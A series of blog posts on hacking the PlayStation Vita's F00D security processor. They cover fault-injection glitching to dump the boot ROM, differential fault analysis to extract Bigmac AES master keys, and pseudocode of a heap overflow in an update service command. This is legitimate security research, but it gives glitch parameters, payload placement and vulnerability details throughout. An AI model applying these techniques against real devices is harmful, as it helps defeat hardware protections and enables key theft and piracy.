As mentioned above, one of the two main challenges is to figure out when to trigger the glitch. We can toggle the LED as a trigger before the reset handshake but the SLSK load process takes anywhere from 10ms-22ms. Even worse, when the load fails for any reason, it will sleep for a random amount of time between 0ms and 4ms. 22ms does not seem like much but assuming each step width is 27ns (chosen because the external clock is 37MHz), we have 814,000 possible offsets times however many number of glitch widths we want to try. On the DEM because of all the debug logging, each boot takes around 45 seconds, so brute force checking is impracticable (more than a year to try all possible offsets for a single width).

We make the reasonable assumption that future predicts past and that the DEM boot code is similar to the retail boot code. Using xyz’s Ghidra plugin we can take a look at the disassembly of the DRAM SLSK load path.

The SLSK address is read from ARM (and is saved in uVar1). It first copies in the 64 bytes header and checks it. If the check passes, it copies in the remaining SLSK file with the size computed from the header. We want to find the precise time when the header check happens because we place the payload into the SLSK header. To do this, we look into the disassembly for copy_words (the disassembly is better than the decompilation because timing matters here).

For those unfamiliar with MeP assembly, the repeat instruction will repeat all instructions until the address in the second operand plus an additional two instructions (delay slots) for the number of times specified in the register of the first operand. Basically this code loops and copies 4 bytes at a time from the user specified memory to the SRAM.

Because we know 4 bytes are read at a time, we come up with the following experiment: on the ARM side, we take a valid SLSK and corrupt the word at offset x. Then we trigger the reboot handshake and wait y cycles. After the wait, we “recover” the original word at offset x. If we wait too long, then the copy_word operation will read in the corrupted word at x and then fail to load the SLSK and we see return code 2. If we don’t wait long enough, then copy_word will read in the original word and because the SLSK is valid, we see a return code of 1. Now for each offset x, we vary the cycle count y until we find the lowest y that still returns status 2. This gives us an upper bound for the number of cycles to wait before the word at offset x is copied in. Then we do this for every x.

Now we do a second experiment which is a slight modification. We start with a valid SLSK, trigger the reboot handshake, and wait v cycles. After the wait, we corrupt the word at offset u. This time, if we wait too long, then copy_word will not see the corrupted word and return success status 1. If we don’t wait long enough, copy_word will see the corrupted word and return error status 2. This gives us a lower bound for the cycle offset from the reset handshake to when the word at offset u is copied in. We do this for every u.

Here is the plot for the first 500 bytes:

The first thing we see is that the lower bound and upper bound track each other well. This is important as it shows that our measurement has very small variance and gives us confidence in the results. Secondly, we see that the relationship is mostly linear with a small jump at 64 bytes. This matches the expected behaviour from the retail boot code: 64 bytes are read in first, the header is checked, then the remaining bytes are copied in (if the check passes). Finally, we see that the “jump” happens from 0xB4800 to 0xB5600 which becomes our window of interest if we expect to glitch past the header size field check. After translating cycle count to real time, we reduce the search space from 814,000 possible offsets to 400 possible offsets.

Observing success

The second challenge is to measure success. We have to do it without resorting to probing the eMMC. A key discovery was when we realized that any bus error (even those caused by the boot processor) will cause an interrupt to the ARM cores which (only on the DEM units) causes an error message to be printed out. Since the boot code does not do any address checks, if we put a valid SLSK at the edge of memory, then it will trigger a bus error message to be printed out when the read hits the end.

In order words, say we craft a valid SLSK header which specifies the size is 0x2000 and we put this header at 0x1F85F000. That region of memory ends at 0x1F85FFFF so when the boot code attempts to read in 0x2000 bytes, then after 0x1000 bytes it will go out of bounds and trigger a bus error message to be printed out.

How do we use this to measure if a glitch succeeded? We found through trial and error that the maximum size specified in the SLSK header is 0x1C000 bytes. Anything beyond that fails the header checks. So if we set the size to 0x1D000 and put the header at 0x1F844000, then when the glitch fails, the “remaining” data will not be read in and nothing happens. If the glitch succeeds, then the boot code will attempt to read 0x1D000 bytes but after 0x1C000 bytes it will hit the end of the memory region and we will see the bus error get printed out.

Since we wish to trigger an exception as soon as the SLSK header is read in and we know that the header size field is checked soon after, any time we successfully glitch the size field check also gives us information about when we can trigger the exception glitch. In effect, we use one glitch to gain information for future glitches.

Injected payload

In the final act, we create the payload the dumps the boot code. Through experimentation, we discovered that once the code reaches the while (1) dead-loop upon failure, the chances of an exception glitch is pretty much nil. (The technical explanation has to do with timing of critical paths and how shorter paths are less susceptible to fault behaviour.) In order to maximize the time between the header read and the dead-loop, we created an exception vector payload that passes the SLSK header check so it can reach the next phase of reading in the “rest of the SLSK”. We then try to cause an exception glitch while this is happening.

The way we do this is actually pretty simple. We took an existing SLSK header and tried to “disassemble” it as MeP code. We noticed that if we interpret the valid header as “code”, the instructions from offset 0x8 (where the reserved instruction exception vector resides) to offset 0x20 are benign and are essentially no-ops. The header check function does not check the data from offset 0x20 to 0x40 (in the real SLSK header, this contains a SHA-256 hash of the decrypted code) and we can use this space for our payload. 32 bytes is enough to jump to some region of memory we control where we copy out the boot code.

Pictured (top to bottom, clockwise): front shell of DEM disassembled, oscilloscope probes to see the glitches, ChipWhisperer Lite glitcher, breadboard hosting a single pullup resistor for LED GPIO trigger (ignore the unused/unrelated chip), Morgana, DEM unit under attack.

Putting this all together:

Just as before, we use a ARM kernel exploit, ARM TrustZone exploit, and F00D exploit to gain execution in all three contexts.
Our exception vector payload and the final boot code dumper code are placed in memory.
We arm the hardware glitcher by a UART message. The next GPIO toggle will trigger the glitch. Arming the glitcher prevents accidentally glitching at the wrong time (i.e. when boot-up takes over the LED lights for example).
The F00D reset sequence is triggered from ARM TrustZone and F00D. We pass in the address to our exception vector payload (masquerading as a SLSK header).
We spin for exactly 0xB4800 cycles (as determined by “narrowing the parameter search”).
The LED GPIO pin is toggled, this signals the hardware glitcher to trigger a glitch after some offset.
We wait up to 10 seconds for the dump to appear over UART. If not, we choose a different set of glitch parameters (chosen amongst the results from “observing success”), restart the DEM and start over.

Offsets 240-250 with width 59 at glitch clock 37MHz can consistently trigger the payload. Note that these parameters are highly specific to our specific setup.

Resources

If you want to learn more about hardware glitching, the ChipWhisperer Wiki is a great place to start. If you get a ChipWhisperer Lite hardware, you can follow the tutorials there to learn more. Our work was all done on a ChipWhisperer Lite along with some molecule mods that enables features such as eMMC packet triggering, multiple glitch units, edge triggering with extra GPIO inputs, extra clock divider options, and more. You can also find some Vita-specific scripts for the ChipWhisperer for glitching and for DFA. Finally, if you want to learn more about the Vita, the HENkaku wiki is the place to go.

The DEM prototype glitching summarized in this article was done live on Twitch over exactly two weeks. If you want to see the whole process from inception to completion, they are all recorded in vods. Be warned though, more time was wasted going down wrong paths and making mistakes than actual progress–but that is how real hacking works. Thanks to everyone who tuned in and provided help and moral support, and to xyz for providing the exploit to trigger the reset handshake.

Attacking Hardware AES with DFA

2019-02-22T00:00:00-08:00

For the past couple of months, I have been trying to extract the hardware keys from the PlayStation Vita. I wrote a paper describing the whole process with all the technical details, but I thought I would also write a more casual blog post about it as well. Consider this a companion piece to the paper where I will expand more on the process and the dead ends than just present the results. In place of technical accuracy, I will attempt to provide more intuitive explanations and give background information omitted in the paper.

DFA

For a nice practical introduction to differential fault analysis, check out this article on using DFA to attack white-box software AES. The authors give a good explanation that is not overly academic and actually presents code at the end (which we use for our attack). The main idea of DFA is this: we can use glitch attacks on AES hardware just as we can on processors, but instead of using it to control code execution, we use it to make faulty AES encryptions with the right key. Since AES is a brittle algorithm, slight modifications will cause it to leak information about the key in unintended ways and we abuse this fact.

Unfortunately, there is not much interest in AES DFA outside of academia. A search on Github shows a handful of results and overall we only found two serious implementation of AES DFA attacks. dfa-aes is an implementation of a 2009 paper where a single precise fault in round 8 and $2^{32}$ brute force can yield the AES-128 key. phoenixAES (from the authors of that article linked to above) is an implementation of a 2003 paper which requires two separate precise faults in round 8 and no brute force (although later on, we will later describe some modifications that relaxes the “precise fault” requirement and increases the required brute force to about $2^8$). There has been many other papers published from 2002 to 2016 describing attacks that assume faults in earlier rounds or more bytes are affected by a fault or other parts of the algorithm. However, we were not able to find any source code attached to these papers. In the end, we derived our work from phoenixAES even though it was not state-of-the-art because writing code is boring and most of the improvements in the literature do not mean much in practice (one hour vs five minutes is a lot of time but if you only have to do it once, the time it takes to write all that code and debug it would negate the gain).

With that rant aside, the main bulk of work is in perfecting our glitching setup in order to inject precise (as in corrupting no more than a single byte) faults on the AES engine during round 8. Once we have that in place, we can feed the collected samples into phoenixAES (or dfa-aes) and it should Just Work.

DPA

Before getting into how we designed the setup for DFA glitching, it is worth sidetracking into our (failed) attempt on a DPA attack on the Vita as context for some of the design decisions made later on. Differential power analysis is a type of side channel attack where if the attacker observes the power consumption of the AES engine while it is operating with a secret key, then it is possible to leak the key. First she hypothesizes the value of a part of the key. Next, the attacker defines a power usage model of the AES engine to predict how much power is consumed if a random input is encrypted and the hypothesis was correct. Finally, she actually runs the engine with that input and measures the actual power consumption to see how close the prediction was. By repeating this many times and for different parts of the key, it is possible to find the entire key. Chipwhisperer wiki has a great introduction to how differential power analysis works that goes into much more details but is still approachable.

In order to do DPA on a target, you need to be able to precisely measure the current in the chip. One way is an application of Faraday’s law: a changing magnetic field induces a voltage. You can measure current with a “magnetic probe.” Colin O’Flynn described at Blackhat how to build your own magnetic probe and I managed build one and to get it to work with the ChipWhisperer example target.

Unfortunately, the size of the loop determines how precise your measurements can be. The DIY $5 probe has a loop size almost as large as the entire chip while the AES engine is less than 1% of the total area of the chip, are we were unable to get a good signal-to-noise ratio. A good current probe with a small loop size can run for thousands of dollars, and that was outside the budget. An alternative way of measuring current is an application of Ohm’s law: a change in current through a resistor is equivalent to a change in voltage across a resistor. This requires changing the circuit to introduce a small resistor between the power supply and the target chip. As the chip consumes more power, it will pull a larger current from the supply, which causes a larger drop in voltage across the resistor.

To make use of the shunt resistor measurement, we need to first cut the trace in the PCB from the power supply to the target chip. Then we connect the target chip to our custom board, which has a shunt resistor as well as a port for a measurement probe. We use an external power supply to power the board (we could have used the Vita’s own supply but it was easier to just attach an external supply).

Custom designed psvcw board has a shunt resistor, a filter capacitor, and ports for the differential probe and CW glitcher. Also shown on top are the wires probing the eMMC signals going to the target chip. We use them to both flash our payload to the eMMC as well as to trigger the voltage glitch to gain code execution.

External power supply connected to psvcw.

However, even with the shunt resistor method, we were unable to get a good SNR. There was too much external noise (which is possible to get rid of with enough work) but also too much internal noise (which is much harder to get rid of). We observed that the SRAM read/write operations dominate the power trace during the AES encryption (by many magnitudes) so it would be difficult to find any correlation between the traces and the key. We determined that DPA was not possible with out setup because the Vita’s SoC was designed for low power usage. It would have been far too expensive to get the right equipment needed to increase the SNR.

From 0-50 cycles, the trigger GPIO signal toggles on. From 250-350 cycles, the AES operation takes place. At cycle 600, the trigger GPIO toggles off. The small dips all throughout are likely F00D processor operation.

Despite having similar names, DPA and DFA are not similar at all. DPA is a (passive) side channel attack while DFA is an (active) fault attack. However, all the work in attempting DPA was not wasted. First, we gained valuable information on when the AES operation takes place. By comparing the trace of a single AES operation with other traces we collected (i.e. with no AES operation or with multiple AES operations), we conclude that the AES operation happens where the power dips at around 250-350 cycles after the trigger. The PCB modifications we made to insert a shunt resistor and reduce the SNR in the measurements also serves the dual purpose of allowing for more precise glitches. This is important because previously, we were targeting the security processor with glitches (in order to get code execution), and it was fine to glitch for multiple cycles in order to cause some effect. However, with the AES engine performing 4 operations per cycle, we need to be able to cause sharp voltage spikes without it being filtered out by the device’s power distribution network. The shunt resistor helps with this.

PlayStation Vita’s security architecture

Why is the Vita, a commercially failed product from Sony, such an interesting attack target? Those who follow my blog can see that for the past couple of years, the Vita has dominated my interest. Besides wanting to show some love for my favorite overlooked console, the technical reason for why I enjoy hacking the Vita is because it is an extremely unique device that implements a lot of security features “right.” The device was released in 2012, when most Android phones did not have basic exploit mitigations such as address randomization enabled and when its direct competitor (the 3DS) had significant hardware and software security oversights.

(I’ll attempt to provide some background trivia on the software security, but feel free to skip this if you’re not interested.) The OS is completely proprietary with some pieces derived from NetBSD and other pieces from Sony PSP (which itself is proprietary). In a world where most devices run either BSD, Linux, or some RTOS, it is always exciting to see, as a reverse engineer, a new OS. Proprietary does not mean secure though. While it was extremely difficult to find the “initial” bug to dump the kernel (we exploited one of the few NetBSD derived components back in 2013), hiding the code is not security, but obscurity. However, to Sony’s credit, for a whole year nobody was able to dump the kernel and even after we dumped it, nobody else managed to do it for another three years (until we released a jailbreak). The kernel itself has all the standard mitigations against buffer overflow attacks and protections against leaking addresses. It also had some non-standard (at the time) mitigations such as SMAP and syscall firewalls. The Vita also uses ARM TrustZone but at a time where Android phones would store all their secrets in TrustZone, the Vita only uses TrustZone as a buffer to interface with the F00D security processor. Only TrustZone can directly communicate with the F00D processor, but there are no secrets in TrustZone itself, which is a good idea in hindsight.

Bigmac

If we want to see how content (games, data, firmware, updates, etc) is decrypted, we have to look at the F00D processor, which is a satellite processor that handles all the cryptographic and security critical tasks. F00D runs on a largely undocumented architecture but we were able to hack it in due time. However, even hacking F00D is not enough to fully “own” the system. There are many cryptographic keys inside F00D code, but the most important keys including the ones that decrypt the bootloader are hidden away in the silicon and only accessible by the hardware AES engine we call Bigmac. There are 250 of these keyslots. 30 of these keys are called “meta” or “master” keys because Bigmac is only allowed to use them to encrypt data to another keyslot (i.e. to derive keys). It is not possible to directly use the master keys to encrypt data and see the ciphertext.

Most of the keyslots (including all the master keys) are locked before the bootloader is executed. That means only the boot ROM is allowed to use them in Bigmac. So, to summarize the roadmap, here is what we had to have hacked before even getting to this point: WebKit to gain initial execution, ARM kernel, ARM TrustZone, F00D kernel, and F00D boot ROM. Starting from scratch, it took us six years to get to this point and with the exception of F00D boot ROM, it was all done with software vulnerabilities. (We have dumped all our knowledge in a community-maintained wiki.) A reasonable observer might wonder what the point of all this is. For all practical purposes, hacking ARM kernel is enough to jailbreak the system, run homebrew and mods, and (unfortunately) pirate games. However, the reasonable observer would likely have no fun at CTF events. Six years ago, I set an arbitrary goal for myself: to get the decryption key for the bootloader. The idea is that if we can decrypt the first piece of loadable code, then there is nothing Sony can do to hide code in future updates. Later on, this “root decryption” key gained a name: slot 0x208 (a meta key). This post is on capturing that final flag, the last leg of this six year journey.

Glitching and DFA

Previously, I talked about how voltage glitching can be used to get boot-time code execution on the F00D security processor. How is DFA related? Because most keyslots are locked before the boot ROM exits into the bootloader, we need to perform the DFA attack after taking over boot ROM. To do that, we have to repeat the voltage glitch attack on F00D with the same glitching parameters we found before. Previously, the payload we executed just dumps the boot ROM but it has now been replaced with a RPC so we can control Bigmac from the PC though ChipWhisperer’s serial interface. Once this RPC payload is running, we can perform a second glitch with a different trigger signal and different parameters so that it causes a fault in Bigmac AES. The primary task is to find this second set of parameters. Once we have them, we can start collecting faulty ciphertexts by using the RPC to send the Bigmac command, triggering the glitch, downloading the faulty ciphertext, and repeat. With enough faulty ciphertexts, the final task is to do the DFA attack to extract the key.

psvemmc board gathers all the required signals from the Vita’s PCB in one place. It includes wires for eMMC triggering (going to the back of the board), clock (replacing the Vita’s own clock synthesizer chip), UART, power, reset, and GPIO triggering (reroutes an LED signal). It also has a switch to enable eMMC flashing mode which uses the USB2244 and a level shifter to support 1.8V eMMC flashing over USB.

Everything hooked up and working.

Analyzing faulty ciphertexts

To inject a fault into the AES operation, we use the RPC to toggle a GPIO pin and immediately kick off Bigmac. The GPIO toggle sets a reference point and serves as a trigger for the glitcher. We need to wait some number of cycles after the trigger before performing the second glitch. We know from the power trace above that between 250 and 350 cycles the AES encryption takes place. When we try glitching at offsets 240-280, we get faulty output ciphertexts. However, we do not know which round is affected or how many bytes in the state is corrupted. Recall that to use phoenixAES, we need two faulty ciphertexts where each one has a single byte corrupted at round 8 and the two faulty ciphertexts are not the same.

To figure out the relationship between the cycle offset and which AES round is being faulted, we can pass in a known key to Bigmac and try to encrypt a known plaintext. Then we “decrypt” the faulty ciphertext using our known key. At each step of the decryption, we can diff the state matrix with that of the same step decrypting the correct ciphertext. We can assume the step with the least number of bits in the state flipped is the step that we managed to fault. Why? Because AES, by design, ensures a property called diffusion. This means that a single bit flip in the input should, on average, result in half the bits in the output to be flipped. Each step in AES attempts to propagate a small change in the state to as many places as possible. For example, let’s say we managed to inject the fault right after MixColumns in round 5 such that a single bit is flipped in byte 0 changing 0xAA to 0xAB. In round 6 SubBytes, byte 0 is passed into the S-Box, where an input of 0xAA yields an output of 0xAC but an input of 0xAB yields an output of 0x62. Note that we now have 5 bits flipped. Continuing to round 6 MixColumns, we see that each column is scrambled which means that 4 bytes are now different. Then in round 7 ShiftRows, each of those 4 bytes are repositioned to a different column and another MixColumns will scramble each column some more (now all 16 bytes are different) and so on for another 3 rounds. It’s easy to see how a tiny change in the state of one round will result in huge changes in the state as we go through more rounds.

Using this, we can collect many sample faulty ciphertexts at each offset and see which round is mostly affected with each offset. The video below shows this working in action: we change up the glitch offset and trigger a glitch and then immediately analyze the faults to see what round was affected and which bits in the state were flipped.

Watch DFA analysis script + fine tuning glitches - Vita Hacking from YifanLu on www.twitch.tv

Additionally, we also found that regardless of the offset, the majority of our faults affects only one or two bits. This is better than what phoenixAES requires (a single byte corrupted).

Extracting keys

With the right offsets, we can get faults at round 8. With high probability, we get 1-2 bit flips and it works for what phoenixAES requires. However, what if we’re unlucky and we happen to collect two faulty ciphertexts with > 1 byte corrupted? We did run into this issue (and it’s not completely based on luck). The “best” solution here is to change the fault model. We’re using the model first proposed by Piret in 2003 and implemented in phoenixAES. However, later models allow up to 12 bytes of corruption (although there are some restrictions). Since we’re lazy and don’t want to write a lot of code, we can do something suboptimal.

Dumb DFA

The key insight here is that if we pass in two faulty ciphertexts that do not “fit the model” (have more than 1 byte corrupted), it will return no solution. So, how about we just try every combination of faulty ciphertext? How many would we have to try before we find a working pair?

Let’s assume that with probability $p=0.25$, we get a 1-byte faulty ciphertext (the histogram above shows this estimation is conservative). The number of ciphertexts, $X$, we expect to collect before getting one such ciphertext follows a geometric distribution and $\mathop{\mathbb{E}}[X]=1/p$. By linearity of expectations, two such ciphertexts would require $m=2\mathop{\mathbb{E}}[X]=2/p=8$ samples. (In reality each trial is not independent, but this gives us a rough idea.)

If we have $m$ samples, then our “brute force” method would require ${m \choose 2} = O(m^2)$ tries to find the key. Practically, with $m \lessapprox 2^{16}$, this dumb brute force solution out-performs the 2009 result implemented by dfa-aes (see the section on DFA at the start) which requires only one fault in round 8 but $2^{32}$ brute force.

Slightly more dumb DFA

It would be great if we can assume independence on which bits are flipped by the fault injection. However, in reality that is not the case because “which bit gets corrupted” is dependent on the physical layout of the transistors along with process variations and the data being processed. For about $20\%$ of the slots, we were unable to get any faulty ciphertext with just one byte of corruption in round 8. Since we were already brute forcing the two input faulty ciphertexts to phoenixAES, on a whim, we also decided to replace the correct ciphertext input with each faulty one (for ${m \choose 3} = O(m^3)$ number of attempts). Like magic, this worked and we got the remaining keys! Now, depending on the kind of person you are, you can either consider this a gift from God or you can stay up all night wondering why it worked. The proof is presented in the paper but is a bit technical and not too interesting. The short version is that since we are doing differential analysis, if the same bit is flipped in the “correct” ciphertext as well as both corrupted ciphertexts, everything still works out. This means that the lack of independence in the flipped bits actually turned out to help us.

There is a downside though. We lose the assumption that if we find a solution, then it will be right. For a handful of slots, we accidently corrupted the state for two rounds instead of one and ended up with a slightly wrong key. However, once we identified this error, we were able to recover the right key by assuming at most 4 bits of the key were wrong (recall the distribution of the number of bits corrupted by the glitch) and then brute forcing $256^4$ possible ways the key got corrupted.

Extending to AES-256

So far, we only referred to attacking AES-128 keys. However, extending it to AES-256 is not too difficult. Instead of attacking round 8, we attack round 12 for the same results. This only gets us half the key, though. To get the other half, we need to apply the round key we found to reverse a single round of AES. Then we attack round 11 the same way and with the two round keys combined, we can get the full key.

The complete setup: psvemmc powered by USB and connected to ChipWhisperer over a 20-pin connector. The CW glitch port goes to psvcw glued on the bottom of the board which houses the shunt resistor. The CW measure port goes to the CW105 differential probe which plugs into the psvcw board as well. The power supply for the CW105 probe is a $5 DC-to-DC converter from eBay where the source is a RPI Zero powered through USB. The red and blue wire connects the external 1.1V power supply to psvcw. Finally the battery and USB multiconnector powers the Vita itself. The box is not just an advertisement; it holds the CW at a slight angle so the torque doesn’t rip the glue from the psvemmc board. This innovative solution was the result of weeks of frustration at wires falling apart.

Master keys

So far, everything described works for non-master keys. Recall from earlier that we said master keys cannot be used to directly encrypt content. Instead the process involves using Bigmac to encrypt some plaintext to another keyslot, where the slave keyslot cannot be read out either. Of course one way to get around this is to perform two levels of DFA attack: one fault to fill the slave keyslot and then $m$ faults using the slave keyslot in order to recover the faulty ciphertext for the master keyslot. However, we did not go down this route because we already know of a hardware vulnerabilty in Bigmac that exposes the slave keys.

Davee wrote a great post about how this vulnerability works. In short, because Bigmac does not clear the internal state after a successful encryption, if you perform a second encryption with size < 16 bytes (block size of AES), then it “borrows” the remaining bytes from that internal state (which happens to be the same as the slave key because it was the last encryption operation). Using this fact, we can brute force the remaining bytes with four $2^{32}$ tries to recover a single slave key. (You might notice a theme occurring here: if something doesn’t work, just brute force it.)

For each master keyslot, we collect around $m=100$ samples (to be safe) of these slave key “partials.” Then we run Davee’s tool to “bust” the partials and recover the slave key. This slave key is the corrupted ciphertext. Then we do the same DFA attack described above and we can recover the master key as well.

For the partial busting, we spinned up an AWS c5.18xlarge spot instance (with has 72 AES-NI enabled cores), which can bust one partial in around 15 seconds (the longest we’ve seen was still under than a minute).

AWS EC2 core utilization over a couple of hours.

Conclusion

We recovered all 30 master keys including the slot 0x208 key.

Last hash before I turn into a Switch hacker. Full Vita 0x208 key SHA256: 14127cc3f75e78239ae77a55a9ae42fe0bf9bace7d64a9401d1fdf844045c53d
— Yifan (@yifanlu) January 30, 2019

We also recovered 238 of the 240 non-master keys. The last two are AES XEX keys for full-disk-encryption and are locked out before we can execute the RPC payload (which is loaded from the eMMC). Getting them would require additional work that we did not find to be useful because the keys are device unique.

Costs

Such an attack is not as expensive as one might think. We are hobbyists working on this only during our free time for a span of half a year. We received no funding or access to any professional labs. The total cost of the whole experiment from the equipment to the boards to AWS EC2 was easily less than $1000. The majority of that cost was in the Rigol osciloscope (for debugging) ($400) and the ChipWhisperer Lite ($300). In a world where software attacks are getting harder and harder to pull off and companies are protecting more and more of their software with hardware security, it seems like a huge oversight that the hardware is not protected as well.

The remaining cost was dominated by the death of 9 Vita motherboards. Here are their obituaries: one gave the pinout for eMMC, two led to the realization that 3.3V eMMC damages the SoC, one taught the importance of not keeping the solder iron too hot, two brought caution in probing since shorting the adjacent 1.1V core to 1.8V IO is not allowed, one had internal metal on a cut trace warp and got shorted due to heat expansion from a reflow, two died from mysterious causes. (Thanks to everyone who donated spare Vita boards for this experiment.)

Say a prayer to all the Vitas who’ve given their lives in service of greater knowledge. pic.twitter.com/oaqQ562TRW
— Yifan (@yifanlu) February 2, 2019

Code

As always, all the tools referenced in this post are public and open source. Please check out the paper for more details on the setup and implementation.

Our fork of ChipWhisperer contains all the modifications needed to glitch the Vita target.
f00dsimpleserial includes the RPC payload, the ChipWhisperer scripts to run it, the ChipWhisperer scripts to glitch Bigmac and collect ciphertexts, the analysis scripts, and the DFA tools based off of phoenixAES.
f00d-partial-buster brute forces the slave keys from the partials.
psvemmc and psvcw target boards for interfacing with ChipWhisperer.

The First F00D Exploit

2019-01-11T00:00:00-08:00

This article was originally written 2019-01-11 and published on 2019-07-29 for the third anniversary of HENkaku, the first Vita jailbreak. It documents the work we did in early 2017, just days after the seminal “octopus” exploit. Although the work is dated and does not open any new doors, the technical contents might be interesting for a particular audience. The original intention was to post this after someone else independently discovers the same vulnerability. There were many overt hints on the HENkaku wiki that the 0x50002 service was buggy but I underestimated the interest (or skills) that people would have in hacking an exotic processor that ultimately does nothing for people who just want to run homebrews or play pirated games.

The PlayStation Vita carries a custom designed chip with a security processor running an exotic instruction set (Toshiba MeP). We name this processor F00D and talked about it at length about how we dumped it. However, dumping the private memory isn’t enough. We want code execution and to do that we need to find a memory corruption vulnerability. Thanks to the dumps we got from the octopus exploit and the analysis from the IDA plugin we have all the tools we need to dig deep into the code and look for bugs.

A buggy service

Long before octopus, we found a bug in command 0x50002 in update_service_sm.self. The details of this command are not important, but essentially it performs the per-console encryption of the boot loaders before it is flashed by the updater. To do this, the command takes in a list of memory ranges corresponding to the buffer to encrypt (for the keen minded, this is the same list format as the one discussed in the octopus exploit and is done because F00D does not support virtual memory addressing natively). The bug allowed us to point to pointers in F00D private memory but does not allow us to do anything directly. In order words, we have second level pointers where the second level can be in F00D private memory but not the first level. Unfortunately, we went nowhere with this bug as it seemed difficult to exploit. But it did give us hope seeing that there were missing security checks inside F00D.

After we dumped F00D with octopus, the first thing we decrypted was update_service_sm.self and we took a closer look at 0x50002.

Bigmac batch operations

Before going into the details of the vulnerability, it is important to know how F00D does crypto operations. F00D contains a dedicated crypto hardware accelerator we call “bigmac.” Davee talks about it in his post on a hardware bug found in bigmac. One of the ways of using bigmac is a batch operation where a linked list of operations is passed in. The format of this linked list is as follows:

typedef struct bigmac_op {
  void *src_addr;
  void *dst_addr;
  uint32_t length;
  uint32_t operation; // ex: 0x2000
  uint32_t keyslot; // ex: 0x8
  uint32_t iv; // ex: 0x812d40
  uint32_t field_18; // ex: 0x0
  struct bigmac_op *next;
} __attribute__((packed)) bigmac_op_t;

The fields are self explanatory and all pointers are physical addresses (F00D does not support virtual memory). It is acceptable for src_addr and dst_addr to be the same.

Command 0x50002

Command 0x50002 is used by the updater to encrypt the bootloaders with a console-unique key. This is to protect certain types of downgrade attacks where the attacker can write to the eMMC as well as Syscon but NOT execute arbitrary ARM kernel code. It seems like a contrived attack and it probably is, but Sony’s strategy always seems to be “add crypto first, think later.” However the point of this command isn’t particularly relevant to us. We just care about its operation.

The command takes in a list (maximum number of entries: 0x1F1) of address+length pairs and can operate in two modes. In LV2 mode, the list is interpreted as second level pointers. Each list entry points to a region of LV1 entries (address+length pairs). Each LV1 entry points to a region of memory of arbitrary size that is to be encrypted. In LV1 mode, the list are LV1 entries directly. The reason for having LV2 mode is that Sony does not want to limit themselves to 0x1F1 maximum regions to encrypt in one operation. Let’s take a look at what the command input buffer looks like.

typedef struct {
  void *addr;
  uint32_t length;
} __attribute__((packed)) region_t;

typedef struct {
  uint32_t unused_0[2];
  uint64_t use_lv2_mode; // if 1, use lv2 list
  uint32_t unused_10[3];
  uint32_t list_count; // must be < 0x1F1
  uint32_t unused_20[4];
  uint32_t total_count; // only used in LV1 mode
  uint32_t unused_34[1];
  union {
    region_t lv1[0x1F1];
    region_t lv2[0x1F1];
  } list;
} __attribute__((packed)) cmd_0x50002_t;

In LV2 mode, we set use_lv2_mode = 1 and list_count to be the total number of LV2 entries (max 0x1F1). Then each list.lv2 entry will point to an array of region_t representing LV1 entries. total_count is unused.

In LV1 mode, we set use_lv2_mode = 0 and list_count to be the total number of LV1 entries (max 0x1F1). Then each list.lv1 entry will point to a region to encrypt. total_count is set to the total number of LV1 entries (max 0x1F1).

Wait what?

Did you notice something weird here? If you said “why is the total number of LV1 entries stored twice” then congratulations, you found the first bug. But we’re getting ahead of ourselves. Let’s see how this command works. There are three parts to it. First, the input arguments are parsed and validated. Next, a heap buffer is allocated to convert the the LV1 entries to bigmac AES-128-CBC operations. Finally, bigmac is invoked in batch mode to encrypt all the regions in the LV1 entries. Here is the pseudocode for the first part:

int get_entries(cmd_0x50002_t *args, uint32_t *p_size) {
  if (args->list_count >= 0x1F1) {
    return 0x800F0216;
  }
  if (args->use_lv2_mode == 1) {
    *p_size = 0;
    for (uint32_t i = 0; i < args->list_count; i++) {
      *p_size += (args->list.lv2[i].length) / sizeof(region_t);
      // NOTE: p_size wraparound is NOT checked but this exploit path is harder
    }
  } else {
    *p_size = args->total_count;
  }
  return 0;
}

int handle_0x50002(cmd_0x50002_t *args) {
  int ret;
  uint32_t entries;
  char *buf, buf_aligned;
  bigmac_op_t *batch;

  if ((ret = get_entries(args, &entries)) != 0) {
    return ret;
  }

  // sizeof(bigmac_op_t) == 32
  if ((buf = malloc((entries * sizeof(bigmac_op_t)) + 31)) == NULL) {
    return 0x800F020C;
  }
  // NOTE: the size argument of malloc can also wraparound

  buf_aligned = (buf + 31) & ~31;
  batch = (bigmac_op_t *)buf_aligned;
  if ((ret = create_batch(args, g_iv, batch, entries)) != 0) {
    goto done;
  }

  if ((ret = run_bigmac_batch(batch, entries)) != 0) {
    goto done;
  }

done:
  free(buf);
  return ret;
}

So already we have two bugs. In get_entries, in LV2 mode, *p_size can wraparound and in handle_0x50002 the malloc’s argument can also wraparound. We spent a day trying to exploit this but turns out there is a much easier path. Let’s look at the second part, create_batch:

int init_bigmac_batch(bigmac_op_t *batch, uint32_t entries, int mask, int keyslot, const void *iv) {
  if (entries == 0 || (batch & 31) != 0) {
    return 0x800F0016;
  }

  for (uint32_t i = 0; i < entries; i++) {
    batch[i].operation = mask;
    batch[i].keyslot = keyslot;
    batch[i].iv = iv;
    batch[i].field_18 = 0;
    batch[i].next = &batch[i+1];
  }

  batch[entries-1].next = 0xFFFFFFFF; // indicate end

  return 0;
}

int create_batch(cmd_0x50002_t *args, const void *iv, bigmac_op_t *batch, uint32_t entries) {
  int ret;

  if (args == NULL || batch == NULL || entries == 0) {
    return 0x800F0216;
  }
  
  if ((ret = init_bigmac_batch(batch, entries, 0x2000, 0x8, iv)) != 0) {
    return ret;
  }

  if (args->list_count >= 0x1F1) {
    return 0x800F0216;
  }

  if (args->use_lv2_mode == 1) {
    uint32_t k = 0;
    for (uint32_t i = 0; i < args->list_count; i++) {
      region_t *lv1 = (region_t *)args->list.lv2[i].addr;
      // Sidenote: `lv1` not being checked in the whitelist is the first bug we 
      // found as described in the introduction. We were not able to exploit this.

      for (uint32_t j = 0; j < args->list.lv2[i].length / sizeof(region_t); j++) {
        batch[k].src_addr = lv1[i].addr;
        batch[k].dst_addr = lv1[i].addr;
        batch[k].length = lv1[i].length;
        k++;
        if (!is_region_whitelisted(lv1[i])) {
          return 0x800F0216;
        }
      }
    }
  } else { // LV1 only mode
    for (uint32_t i = 0; i < args->list_count; i++) { // WHAT ABOUT args->total_count?
      batch[i].src_addr = args->list.lv1[i].addr;
      batch[i].dst_addr = args->list.lv1[i].addr;
      batch[i].length = args->list.lv1[i].length;
      if (!is_region_whitelisted(args->list.lv1[i])) {
        // Note: We actually will fail the whitelist check when exploiting the 
        // heap overflow. However, that is fine as batch[i] is written BEFORE 
        // the whitelist check and `free` is always called.
        return 0x800F0216;
      }
    }
